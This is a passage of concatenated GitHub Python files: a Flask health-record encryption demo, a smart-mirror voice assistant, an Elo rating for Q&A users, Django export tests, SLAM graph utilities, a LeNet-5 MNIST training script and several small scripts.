create signature with private_keyA(pubkey(data)+metadata)) + pubkeyA(data)+metadata) pubkey(a) return privh(pubkey(data)+metadata))\n :return:\n \"\"\"\n create_keys_if_empty()\n\n # TODO: validate formatting using FHIR validators\n fhir_data = request.get_json()\n fhir_data = json.loads(fhir_data) if type(fhir_data) is str else fhir_data\n fhir_metadata, phi = clean_fhir_data(fhir_data[0])\n\n (\n signature_patient,\n signature_verifier,\n public_key_verified,\n ) = chain_data_verifier_transaction(fhir_data, fhir_metadata)\n\n t1_id = str(uuid.uuid4())\n t2_id = str(uuid.uuid4())\n\n print(os.getcwd())\n with open(f\"./records/{t1_id}.json\", \"w+\") as f:\n json.dump({\"patient_signature\": str(signature_patient)}, f)\n\n with open(f\"./records/{t2_id}.json\", \"w+\") as f:\n json.dump(\n {\n \"verifier_signature\": str(signature_verifier),\n \"verifier_public_key\": str(public_key_verified),\n },\n f,\n )\n\n payload = {\"transaction 1\": t1_id, \"transaction 2\": t2_id}\n\n return str(payload), 201, {}\n\n\n@app.route(\"/pub-b\", methods=[\"GET\"])\ndef get_pub_b_customer():\n create_keys_if_empty()\n\n with open(\"business.pub\", \"rb\") as file:\n key = serialization.load_pem_public_key(file.read())\n\n return str(\n key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n )\n\n\n@app.route(\"/pub-b-return\", methods=[\"GET\"])\ndef get_pub_b_():\n return \"\", 501, {}\n\n\n@app.route(\"/get-valid-patients\", methods=[\"GET\"])\ndef get_valid_patients():\n \"\"\"\n Given criteria of patient_diseases, search and get the number of patients from the blockchain who match\n :return: list of uuid records of P\n \"\"\"\n valid_conditions = []\n for condition in request.args.getlist(\"condition\"):\n valid_conditions.append(condition)\n\n # Iterate through all valid nodes on blockchain, if it's a node with metadata try to read its metadata\n node_list = get_all_nodes()\n # return uuids of all nodes\n\n valid_patients = []\n for node_address in node_list:\n node_data = parse_node(node_address)\n if not node_data:\n continue\n metadata = node_data[1]\n for valid_condition in valid_conditions:\n if valid_condition in metadata.get(\"conditions\", []):\n valid_patients.append(node_data)\n\n return {\"num_patients\": len(valid_patients) + 1}\n\n\n@app.route(\"/decode-patient-data\", methods=[\"POST\"])\ndef decode_data():\n \"\"\"\n Given Pointer TO PubA(Data) + metadata we execute the following transactions\n\n 1. Return PubB(PrivA) (logged as transaction on change)\n 2. Use PrivB(1) --> PrivA\n 3. Use PrivA(PubA(Data)) + metadata to get Data + metadata\n 4. 
Return 1 (uuid logged on chain) and 3 (location calculations only visible to B)\n :return:\n \"\"\"\n with open(\"../patient_1.json\") as f:\n json_result = json.dumps(json.load(f)).encode('utf-8')\n\n public_key_patient = load_key(\"key.pub\", private=False)\n private_key_patient = load_key(\"key.pem\", private=True)\n\n encrypted_patient_data = encrypt_message(json_result, public_key_patient)\n\n key_text = private_key_patient.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.PKCS8,\n encryption_algorithm=serialization.NoEncryption(),\n )\n\n public_key_business = load_key(\"business.pub\", private=False)\n private_key_business = load_key(\"business.pem\", private=True)\n\n encrypted_primary_key = encrypt_message(key_text, public_key_business)\n\n recovered_primary_key_patient_text = decrypt_message(encrypted_primary_key, private_key_business)\n\n recovered_key_patient = serialization.load_pem_private_key(\n recovered_primary_key_patient_text,\n password=None,\n )\n\n unencrypted_patient_data = decrypt_message(encrypted_patient_data, recovered_key_patient)\n\n return unencrypted_patient_data, 201, {}\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"melvinhe/HealthChain","sub_path":"HealthChainClient/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22682938751","text":"#!/usr/bin/python3\n\nfrom google.cloud import texttospeech\nfrom google.oauth2 import service_account\nimport time\nfrom threading import Thread\nfrom pygame import mixer\nimport webbrowser\nfrom Logs import Logging\nimport os\nimport sys\nimport text_manipulation\n\n\n\n# To track how many interactions the user has had with the system\ninteractions = 0\n\n# Setup Google cloud credentials\nGOOGLE_CLOUD_CRED = service_account.Credentials.from_service_account_file(\n '/Users/james/Documents/Fourth Year/Project Module/api-key-speech-recognition.json')\n\n\n# Tone to provide feedback to user that the device is ready for their request\ndef start():\n mixer.init()\n mixer.music.load(\"Start_tone.mp3\")\n mixer.music.play()\n\n\n# Tone to provide feedback to user that the device has finished the interaction\ndef end():\n mixer.init()\n mixer.music.load(\"Closing_tone.mp3\")\n mixer.music.play()\n\n\n# Tone to alert the user to that their timer has finished\ndef alert():\n mixer.init()\n mixer.music.load('alarm.mp3')\n mixer.music.play()\n\n\n# Method to deal with turning the text response into an audio file for the user feedback\ndef speak(self, weather):\n response_text = self\n\n print(\"Speaking\")\n\n # Setup the voice of the assistant\n voice = texttospeech.types.cloud_tts_pb2.VoiceSelectionParams(\n language_code='en-GB',\n ssml_gender=texttospeech.enums.SsmlVoiceGender.MALE,\n )\n\n # Create The text-to-speech client with the required credentials\n client = texttospeech.TextToSpeechClient(credentials=GOOGLE_CLOUD_CRED)\n\n # setup the configuration of the audio file\n audio_config = texttospeech.types.cloud_tts_pb2.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3\n )\n # Set the text to be said\n input_response = texttospeech.types.cloud_tts_pb2.SynthesisInput(text=response_text)\n\n # Conduct the text-to-speech request on the specified text response\n response = client.synthesize_speech(input_response, voice, audio_config)\n\n # Response is in binary format\n with open('response.mp3', 'wb') as r:\n 
r.write(response.audio_content)\n        print(\"Created the audio file\")\n\n    # Loading mixer and then loading audio file and then playing the response to the user\n    mixer.init()\n    print(\"Loading audio response\")\n    mixer.music.load('response.mp3')\n    print(\"Responding\")\n    mixer.music.play()\n    if weather:\n        time.sleep(10)\n    else:\n        time.sleep(5)\n    os.remove(\"response.mp3\")\n    mixer.quit()\n\n\n# Method to deal with finding and deciding what to do with the users request\ndef mirror_mirror(self):\n\n    print(\"-------------------------------------------------\")\n    print(\"Finding response in mirror\")\n\n    request = self\n    found = False\n    print(str(request))\n\n    objects, intents = text_manipulation.request_processing(request)\n    print(intents)\n    print(objects)\n\n    if \"what\" in intents:\n\n        from my_time import Times\n\n        if \"time\" in objects:\n\n            response = Times.current_time()\n            speak(response, False)\n            found = True\n\n        elif \"date\" in objects:\n\n            response = Times.current_date()\n            speak(response, False)\n            found = True\n\n        elif \"weather\" in objects:\n            from my_weather import MyWeather\n            if len(objects) > 2:\n                # date = objects[len(objects) - 1]\n                location = objects[len(objects) - 2]\n            else:\n                location = objects[len(objects) - 1]\n            response = MyWeather.current_weather(location)\n            speak(response, True)\n            found = True\n\n        else:\n            response = \"You can call me, Mirror, Mirror\"\n            speak(response, False)\n            found = True\n\n    elif \"where\" in intents:\n\n        response = \"In your heart.\"\n        speak(response, False)\n        found = True\n\n    elif \"how\" in intents:\n\n        response = \"I am fine, thank you\"\n        speak(response, False)\n        found = True\n\n    elif \"start\" in intents or \"set\" in intents:\n        from my_time import Timer\n\n        if \"timer\" in objects:\n            print(\"Timer initialisation\")\n            word = 0\n\n            # If user specifies a time in minutes, we need to convert this to seconds\n            # This is because the timer is implemented as a sleep which only takes seconds as\n            # its parameters\n            if \"minut\" in objects:\n\n                print(\"Converting minutes\")\n\n                # extracting the time number from the char list\n                t = int(objects[len(objects) - 2])\n\n                response = \"Starting a timer for \" + str(t) + \" minutes\"\n                speak(response, False)\n\n                # Converting the time in minutes to seconds\n                sec = t * 60\n\n                # Starts a new thread so that the timer can run in the background, and not disrupt the\n                # rest of the application\n                thread_timer = Thread(target=Timer.tim,\n                                      args=[sec])\n                thread_timer.start()\n\n            # If time is specified in seconds already, no need to do the conversion\n            elif \"second\" in objects:\n                # extracting the time number from the char list\n                sec = int(objects[len(objects) - 2])\n\n                response = \"Starting a timer for \" + str(sec) + \" seconds\"\n                speak(response, False)\n\n                # Starts a new thread so that the timer can run in the background, and not disrupt the\n                # rest of the application\n                thread_timer = Thread(target=Timer.tim,\n                                      args=[sec])\n                thread_timer.start()\n\n            else:\n                word += 1\n        found = True\n\n    # NEED TO FIX: DOES NOT WORK\n    elif \"who\" in request:\n        data = self.split(\" \")\n        name = data[2]\n        response = \"Hold on, I'm finding information about \" + name\n        speak(response, False)\n        found = True\n\n    else:\n        found = False\n\n    print(\"-------------------------------------------------\")\n    Logging.log(request, found)\n    return 
found\n","repo_name":"Jts996/Smart-Mirror-AI-Assistant","sub_path":"Assistant_responses.py","file_name":"Assistant_responses.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36554364837","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nfrom scrapper_imo import IMOWebsiteScrapper\nimport os\nimport errno\n\ndef main():\n try:\n os.makedirs('../data')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n \n sc = IMOWebsiteScrapper()\n sc.get_all_tables()\n \n \nif __name__ == '__main__':\n main()","repo_name":"lilianabs/imo-website-analysis","sub_path":"scrapper/scrappe_data_imowebsite.py","file_name":"scrappe_data_imowebsite.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44236227591","text":"# if statements\n# x = False\n# if x:\n# print(\"x was True!\")\n# else:\n# # print(\"I will be printed in any case where x is not true\") \n# a=3\n# if(a==3):\n# print(a)\n# if(2!=3):\n# print('yes')\n# else:\n# print('No') \n# num = 3\n# if num > 2:\n# print('num is a positive number')\n# elif num < 2:\n# print('num is a positive number') \n# else:\n# print('num is a positive number') \n# a = int(input('enter value of a'))\n# b = int(input('enter value of b'))\n# if(a>b):\n# print('a is greater than b')\n# if(a-b >= 2):\n# print('the value of a is greater and difference is {}' .format(a-b))\n# elif(a<b):\n# print('a is less than b')\n# else:\n# print('a is eual to b') \n#-----------------------------------------------------------------------------\n\n\n# list = [1,2,3,4,5]\n# for item in list:\n# if not(item%2):\n# print(item)\n#-------------------------------\na = 34\nb = 34\nc = 46\nif (a==b) or (b<c):\n print('the condition is satisfied')\nelse:\n print('the condition is not satisfied') \n \n\n\n","repo_name":"Rutujambekar/personal","sub_path":"python_lectures/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28445499715","text":"from web3 import Web3\nimport json\n\nw3 = Web3(Web3.HTTPProvider('https://rpc.moonriver.moonbeam.network'))\n\nw3.eth.get_block('latest')\n\nf = open('rome-abi.json')\nrome_abi = json.load(f)\nrome_contract_address = \"0x4a436073552044D5f2f49B176853ad3Ad473d9d6\"\n\nrome_contract = w3.eth.contract(address=rome_contract_address, abi=rome_abi)","repo_name":"adrianmcphee/romeradar","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10730389123","text":"from helpers import AnswererInfo\nfrom helpers import MinAnswerCountError\nfrom helpers import MIN_ANSWER_COUNT\n\n\ndef calc_actual_score(my_score, opponent_score):\n # win\n if (my_score > opponent_score):\n return 1\n\n # draw\n if (my_score == opponent_score):\n return 0.5\n\n # loss\n loss = opponent_score - (abs(opponent_score) / 2.0)\n if (my_score < loss):\n return 0\n\n # linear interpolation between loss and draw\n k = 0.5 / (opponent_score - loss)\n m = 0.5 - (k * opponent_score)\n\n return (k * my_score) + m\n\n\ndef calc_k_factor(my_answer_count, opponent_answer_count):\n if (my_answer_count < 100):\n return 8\n\n elif (opponent_answer_count < 100):\n return 
1\n\n else:\n return 4\n\n\ndef calc_expected_score(my_rating, opponent_rating):\n return 1.0 / (1 + pow(10, (opponent_rating - my_rating) / 400.0))\n\n\ndef calc_elo_rating(answerer_list, user_stats_dict):\n rating_update_dict = dict()\n\n # answerer vs answerer\n for i in range(len(answerer_list)):\n me = answerer_list[i]\n my_rating = user_stats_dict[me.user_id]['rating']\n my_answer_count = user_stats_dict[me.user_id]['answerCount']\n rating_update_sum = 0\n\n for j in range(len(answerer_list)):\n opponent = answerer_list[j]\n\n if (me == opponent):\n continue\n\n opponent_rating = user_stats_dict[opponent.user_id]['rating']\n opponent_answer_count = user_stats_dict[opponent.user_id]['answerCount']\n\n expected_score = calc_expected_score(my_rating, opponent_rating)\n actual_score = calc_actual_score(me.score, opponent.score)\n k_factor = calc_k_factor(my_answer_count, opponent_answer_count)\n rating_update_sum += k_factor * (actual_score - expected_score)\n\n # average\n final_rating_update = rating_update_sum / (len(answerer_list) - 1)\n rating_update_dict[me.user_id] = final_rating_update\n\n return rating_update_dict\n\n\ndef update_user_stats(answerer_list, user_stats_dict):\n if (len(answerer_list) < MIN_ANSWER_COUNT):\n raise MinAnswerCountError\n\n rating_update_dict = calc_elo_rating(answerer_list, user_stats_dict)\n\n for i in range(len(answerer_list)):\n user_stats_dict[answerer_list[i].user_id]['rating'] += rating_update_dict[answerer_list[i].user_id]\n user_stats_dict[answerer_list[i].user_id]['answerCount'] += 1\n\n\ndef measure_expertise(df):\n user_stats_dict = dict()\n answerer_list = list()\n question_id = -1\n\n for index, row in df.iterrows():\n if (row['answerer_id'] not in user_stats_dict):\n user_stats_dict[row['answerer_id']] = {'answerCount': 0, 'rating': 1500.0}\n\n if (question_id != row['question_id'] and question_id != -1):\n # next question\n\n update_user_stats(answerer_list, user_stats_dict)\n\n # reset variables\n question_id = row['question_id']\n del answerer_list[:]\n\n elif (question_id == -1):\n # first question\n question_id = row['question_id']\n\n answerer_list.append(AnswererInfo(row['answerer_id'], row['answer_score'], row['answer_id']))\n\n if (len(answerer_list) > 0):\n # last question\n\n update_user_stats(answerer_list, user_stats_dict)\n del answerer_list[:]\n\n return user_stats_dict\n","repo_name":"patrikpp/projects","sub_path":"analysis_of_users_in_cqa_systems/elo_rating.py","file_name":"elo_rating.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5394306064","text":"'''\nCreated on Jul 12, 2012\n\n@author: asseym\n'''\nfrom django.conf import settings\n\ndef dictinvert(dict):\n inv = {}\n for k, v in dict.iteritems():\n inv[v]=k\n return inv\n\n\n\ndef get_summary_dict(session, ussd_menu_dict):\n results = ussd_menu_dict\n pin = None\n keys=dictinvert(ussd_menu_dict)\n for nav in session.navigations.all():\n if nav.screen.downcast().slug in settings.PIN_SLUGS:\n pin = nav.response\n else:\n results[keys.get(nav.screen.downcast().slug)] = nav.response\n results['SESSION'] = session.transaction_id\n results['MSISDN'] = session.connection.identity\n results['PIN'] = pin\n return results\n\ndef get_session_data_turples(session, ussd_menu_dict, action):\n \n results = ussd_menu_dict\n pin = None\n keys=dictinvert(ussd_menu_dict)\n for nav in session.navigations.all():\n val = 
settings.TRANSLATION_DICT.get(nav.screen.downcast().slug,None)\n if val in [\"death_summary\",\"birth_summary\"]:\n pin = nav.screen.downcast().slug\n if val:\n results[keys.get(nav.screen.downcast().slug)] = nav.response\n results['SESSION'] = 1123\n results['MSISDN'] = session.connection.identity\n results['PIN'] = pin\n results['ACTION'] = action\n \n return results.items()\n\n\ndef get_summary(session):\n summary = \"\"\n for nav in session.navigations.all():\n val = settings.TRANSLATION_DICT.get(nav.screen.downcast().slug,None)\n if val:\n summary += \"%s %s \" % (val, nav.response)\n return summary\n\n\ndef get_dictionary_for_session(session):\n def _all_match(session, positions):\n for position in range(len(positions)):\n if not session.navigations.order_by('date')[position].response== str(positions[position]):\n return False\n return True\n for dict in [getattr(settings,d) for d in dir(settings) if d.startswith('UTL_')]:\n if _all_match(session,dict['positions']):\n return dict\n raise Exception('Dictionary for this session cannot be found in session')","repo_name":"unicefuganda/mobileVRS","sub_path":"mobilevrs_project/mobilevrs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"42254206002","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.urlresolvers import reverse\nfrom django.db import IntegrityError, models\nfrom django.forms.models import inlineformset_factory\nfrom django.test import TestCase\nfrom data_exports.templatetags import getter_tags as ttags\nfrom data_exports.models import Format, Export, Column\nfrom data_exports.forms import ColumnForm, ColumnFormSet, get_choices\nfrom inspect_model import InspectModel\n\nfrom data_exports.compat import text_type\n\n\nclass ExportTest(TestCase):\n\n def setUp(self):\n # create an export of the Export model (inception !)\n ct = ContentType.objects.get(app_label='data_exports', model='export')\n self.empty_export = Export.objects.create(name='test empty export',\n slug='test-empty-export',\n model=ct)\n self.im = InspectModel(Export)\n\n # create an export of the Export model with columns\n self.export = Export.objects.create(name='test export',\n slug='test-export',\n model=ct)\n for f in self.im.items:\n Column.objects.create(export=self.export,\n column=f,\n order=0)\n\n user = User.objects.create_user('admin', 'admin@admin.com', 'admin')\n user.is_superuser = True\n user.save()\n\n def test_slug(self):\n \"\"\"Make sure the slug is unique.\"\"\"\n with self.assertRaises(IntegrityError):\n Export.objects.create(name='foo',\n slug=self.empty_export.slug,\n model=self.empty_export.model)\n\n def test_column_choices(self):\n \"\"\"Choices computed for the exported model\n\n When using the ColumnFormSet and the ColumnForm, all the accessible\n items (fields, relations, methods, attributes...) 
from the exported\n model are present in the \"column\" form field choices\n\n \"\"\"\n class OneToOneToExport(models.Model):\n \"\"\"Fake model.\n\n Make sure that get_choices works with\n SingleRelatedObjectDescriptor, as explained in ticket #4.\n\n \"\"\"\n name = models.CharField(max_length=50)\n o2o = models.OneToOneField(Export)\n\n # reload the model's relations, to have the OneToOneToExport's relation\n # taken into account\n self.empty_export._meta._fill_related_objects_cache()\n self.empty_export._meta.init_name_map()\n\n ColumnInlineFormSet = inlineformset_factory(Export,\n Column,\n form=ColumnForm,\n formset=ColumnFormSet)\n formset = ColumnInlineFormSet(instance=self.empty_export)\n # the column field has choices\n form = formset.forms[0]\n self.assertTrue(hasattr(form.fields['column'], 'choices'))\n choices = form.fields['column'].choices\n # all the model items are in the column field choices\n self.assertTrue(all([(i, i) in choices for i in self.im.items]))\n # and all the related model items are in the fields choices\n # export has a FK to Format named 'export_format'\n im_format = ['export_format.%s' % i\n for i in InspectModel(Format).items]\n self.assertTrue(all([(i, i) in choices for i in im_format]))\n # export has a FK to ContentType named 'model'\n im_ct = ['model.%s' % i for i in InspectModel(ContentType).items]\n self.assertTrue(all([(i, i) in choices for i in im_ct]))\n # OneToOneToExport has a OneToOneField to ContentType named\n # 'onetoonetoexport'\n im_o2o = ['onetoonetoexport.%s' % i\n for i in InspectModel(OneToOneToExport).items]\n self.assertTrue(all([(i, i) in choices for i in im_o2o]))\n # revert changes to name_map: 'unload' the OneToOneToExport relation\n del self.empty_export._meta._name_map['onetoonetoexport']\n\n def test_export_without_format(self):\n \"\"\"Export without a format renders to a simple template\"\"\"\n self.client.login(username='admin', password='admin')\n # empty export\n resp = self.client.get(reverse('data_exports:export_view',\n kwargs={'slug': self.empty_export.slug}))\n self.assertContains(resp, 'No columns where defined')\n # full export\n resp = self.client.get(reverse('data_exports:export_view',\n kwargs={'slug': self.export.slug}))\n self.assertNotContains(resp, 'No columns where defined')\n for c in self.export.column_set.all():\n self.assertContains(resp, c.label if c.label else c)\n\n def test_export_with_format(self):\n \"\"\"Export with a format gives a file download\"\"\"\n # create a format for a \"naive csv export\"\n csv_format = Format.objects.create(\n name='naive csv',\n file_ext='csv',\n mime='text/csv',\n template='data_exports/export_detail_csv.html')\n\n self.client.login(username='admin', password='admin')\n\n self.export.export_format = csv_format\n self.export.save()\n resp = self.client.get(reverse('data_exports:export_view',\n kwargs={'slug': self.export.slug}))\n self.assertEqual(resp['Content-Type'], self.export.export_format.mime)\n self.assertEqual(resp['Content-Disposition'],\n 'attachment; filename=%s.%s' % (\n self.export.slug,\n self.export.export_format.file_ext))\n\n def test_export_templatetag(self):\n \"\"\"Templatetags provided for convenience\"\"\"\n # getattribute\n self.assertEqual(ttags.getattribute(self.export, 'model'),\n getattr(self.export, 'model'))\n # getvalue\n d = {'foo': 'bar'}\n self.assertEqual(ttags.getvalue(d, 'foo'), d.get('foo'))\n # nice_display: displays a list for FK and ManyToMany\n column_list = ttags.nice_display(self.export.column_set).split(', ')\n for c in 
self.export.column_set.all():\n self.assertTrue(text_type(c) in column_list)\n # make sure getattribute and nice_display work on all choices\n for c, name in get_choices(Export):\n e = ttags.getattribute(self.export, c)\n ttags.nice_display(e)\n\n\nclass AdminTest(TestCase):\n\n def setUp(self):\n user = User.objects.create_user('admin', 'admin@admin.com', 'admin')\n user.is_staff = True\n user.is_superuser = True\n user.save()\n\n def test_create_export(self):\n self.client.login(username='admin', password='admin')\n ct = ContentType.objects.get(app_label='data_exports', model='export')\n resp = self.client.post(reverse('admin:data_exports_export_add'), {\n 'name': 'test export',\n 'slug': 'test-export',\n 'model': ct.pk,\n '_save': 'Save'})\n # when creating, \"save\" is equivalent to \"save and continue editing\"\n self.assertRedirects(resp,\n reverse('admin:data_exports_export_change',\n args=[1])) # first export created, id=1\n\n # once an export is created, it's no more possible to modify its model\n resp = self.client.get(reverse('admin:data_exports_export_change',\n args=[1]))\n self.assertContains(resp, 'name=\"export_format\"')\n self.assertNotContains(resp, 'name=\"model\"')\n","repo_name":"magopian/django-data-exports","sub_path":"data_exports/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"72426693520","text":"import random\n\nfrom utility.graph import *\n\n\ndef delete_random_vertices(vertices, edges, n):\n \"\"\"\n Deletes n random vertices from vertex list and removes the edges corresponding to them.\n\n :param vertices: List of Vertex objects\n :param edges: List of Edge objects\n :param n: Number of vertices to remove\n :return: (new_vertices, new_edges, edges_removed) - edges_removed is the number of edges that were\n deleted in the end\n \"\"\"\n\n # Make sure the number of vertices being removed makes sense.\n assert(n <= len(vertices))\n\n # Shuffle list of vertices and pick ids of first n vertices for removal.\n random.shuffle(vertices)\n removal_ids = [vertices[i].id for i in range(n)]\n\n # Remove these and return result.\n return remove_vertices(vertices, edges, removal_ids)\n\n\ndef remove_vertices(vertices, edges, vertex_ids):\n \"\"\"\n Wrapper for remove_vertex function designed to remove multiple vertices at once.\n\n :param vertices: List of Vertex objects\n :param edges: List of Edge objects\n :param vertex_ids: ID numbers of vertices to remove\n :return: (new_vertices, new_edges, edges_removed) - edges_removed is the number of edges that were\n deleted in the end\n \"\"\"\n\n # Maintain list of edges removed for each vertex.\n removed_edges = []\n\n for vertex_id in vertex_ids:\n\n # Remove individual vertex and increment number of edges removed.\n vertices, edges, removed = remove_vertex(vertices, edges, vertex_id)\n removed_edges.append(removed)\n\n return vertices, edges, removed_edges\n\n\ndef remove_vertex(vertices, edges, vertex_id):\n \"\"\"\n Removes a single vertex from vertex and edge list pair. 
Deletes vertex from vertex list and removes all edges\n containing that vertex from the edge list.\n\n :param vertices: List of Vertex objects\n :param edges: List of Edge objects\n :param vertex_id: ID number of vertex to remove\n :return: (new_vertices, new_edges, edges_removed) - edges_removed is the number of edges that were\n deleted in the end\n \"\"\"\n\n # Initialize output details.\n edges_removed = []\n\n # Remove vertex from vertex list and update ids.\n new_vertices = []\n\n for v in vertices:\n if v.id != vertex_id:\n\n # Decrease id by one if its id is greater than the one being removed.\n if v.id > vertex_id:\n v.id -= 1\n\n # Add this vertex to new vertex list.\n new_vertices.append(v)\n\n # Initialize new edge list.\n new_edges = []\n\n # Remove edges containing that vertex.\n for edge in edges:\n\n # Edge should be removed if the in vertex or out vertex is the target vertex.\n if edge.in_vertex == vertex_id or edge.out_vertex == vertex_id:\n\n # Increment number of edges removed.\n edges_removed.append(edge)\n\n else:\n\n # Update ids.\n edge.in_vertex -= 1 if edge.in_vertex > vertex_id else 0\n edge.out_vertex -= 1 if edge.out_vertex > vertex_id else 0\n\n # Edge doesn't contain target vertex.\n new_edges.append(edge)\n\n return new_vertices, new_edges, edges_removed\n","repo_name":"jdriscoll7/distributed-slam","sub_path":"distributed-slam/perturbations/deletions.py","file_name":"deletions.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"37458527714","text":"# -*- coding: utf-8 -*-\n\n\nfrom requests import get\n\ndef download_file(url, file_name):\n with open(file_name, \"wb\") as file:\n response = get(url)\n file.write(response.content)\n\n# Commented out IPython magic to ensure Python compatibility.\nimport gzip\nimport numpy as np\nimport pandas as pd\nfrom time import time\n\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport keras\nimport keras.layers as layers\nfrom keras.models import Sequential\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import TensorBoard\n\n# %matplotlib inline\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\ndef read_mnist(images_path: str, labels_path: str):\n with gzip.open(labels_path, 'rb') as labelsFile:\n labels = np.frombuffer(labelsFile.read(), dtype=np.uint8, offset=8)\n\n with gzip.open(images_path,'rb') as imagesFile:\n length = len(labels)\n # Load flat 28x28 px images (784 px), and convert them to 28x28 px\n features = np.frombuffer(imagesFile.read(), dtype=np.uint8, offset=16) \\\n .reshape(length, 784) \\\n .reshape(length, 28, 28, 1)\n \n return features, labels\n\ntrain = {}\ntest = {}\n\ntrain['features'], train['labels'] = read_mnist('train-images-idx3-ubyte.gz', 'train-labels-idx1-ubyte.gz')\ntest['features'], test['labels'] = read_mnist('t10k-images-idx3-ubyte.gz', 't10k-labels-idx1-ubyte.gz')\n\nprint('# of training images:', train['features'].shape[0])\nprint('# of test images:', test['features'].shape[0])\n\n\"\"\"### Split training data into training and validation\"\"\"\n\nvalidation = {}\ntrain['features'], validation['features'], train['labels'], validation['labels'] = train_test_split(train['features'], train['labels'], test_size=0.2, random_state=0)\n\nprint('# of training images:', train['features'].shape[0])\nprint('# of validation images:', 
validation['features'].shape[0])\n\n\"\"\"## Zero Padding\n\n\n\n\n\nThe LeNet architecture accepts a 32x32 pixel images as input, mnist data is 28x28 pixels.\n\"\"\"\n\n# Pad images with 0s\ntrain['features'] = np.pad(train['features'], ((0,0),(2,2),(2,2),(0,0)), 'constant')\nvalidation['features'] = np.pad(validation['features'], ((0,0),(2,2),(2,2),(0,0)), 'constant')\ntest['features'] = np.pad(test['features'], ((0,0),(2,2),(2,2),(0,0)), 'constant')\n \nprint(\"Updated Image Shape: {}\".format(train['features'][0].shape))\n\nmodel = keras.Sequential()\n\nmodel.add(layers.Conv2D(filters=6, kernel_size=(3, 3), activation='relu', input_shape=(32,32,1)))\nmodel.add(layers.AveragePooling2D())\n\nmodel.add(layers.Conv2D(filters=16, kernel_size=(3, 3), activation='relu'))\nmodel.add(layers.AveragePooling2D())\n\nmodel.add(layers.Flatten())\n\nmodel.add(layers.Dense(units=120, activation='relu'))\n\nmodel.add(layers.Dense(units=84, activation='relu'))\n\nmodel.add(layers.Dense(units=10, activation = 'softmax'))\n\nmodel.summary()\n\nmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])\n\nEPOCHS = 40\nBATCH_SIZE = 128\n\nX_train, y_train = train['features'], to_categorical(train['labels'])\nX_validation, y_validation = validation['features'], to_categorical(validation['labels'])\n\ntrain_generator = ImageDataGenerator().flow(X_train, y_train, batch_size=BATCH_SIZE)\nvalidation_generator = ImageDataGenerator().flow(X_validation, y_validation, batch_size=BATCH_SIZE)\n\nprint('# of training images:', train['features'].shape[0])\nprint('# of validation images:', validation['features'].shape[0])\n\nsteps_per_epoch = X_train.shape[0]//BATCH_SIZE\nvalidation_steps = X_validation.shape[0]//BATCH_SIZE\n\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\nhistory = model.fit(train_generator, steps_per_epoch=steps_per_epoch, epochs=EPOCHS, \n validation_data=validation_generator, validation_steps=validation_steps, \n shuffle=True, callbacks=[tensorboard])\n\nscore = model.evaluate(test['features'], to_categorical(test['labels']))\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n# Plot training & validation accuracy values\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('Model accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\n# Plot training & validation loss values\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\n\"\"\"# **Confusion Matrix**\"\"\"\n\n#Confusion Matrix on training:\nfrom sklearn.metrics import confusion_matrix\ny_pred = model.predict_classes(X_train)\nrounded_y_train=np.argmax(y_train, axis=1)\n\n\nCM_train = confusion_matrix(rounded_y_train, y_pred )\nprint(CM_train)\n\n#Confusion Matrix on validation:\nfrom sklearn.metrics import confusion_matrix\ny_pred_test = model.predict_classes(X_validation)\nrounded_y_test=np.argmax(y_validation, axis=1)\n\n\nCM_test = confusion_matrix(rounded_y_test, y_pred_test )\nprint(CM_test)","repo_name":"Saba-Heidari/Machine-Learning","sub_path":"lenet5_mnist_zeropadding.py","file_name":"lenet5_mnist_zeropadding.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} 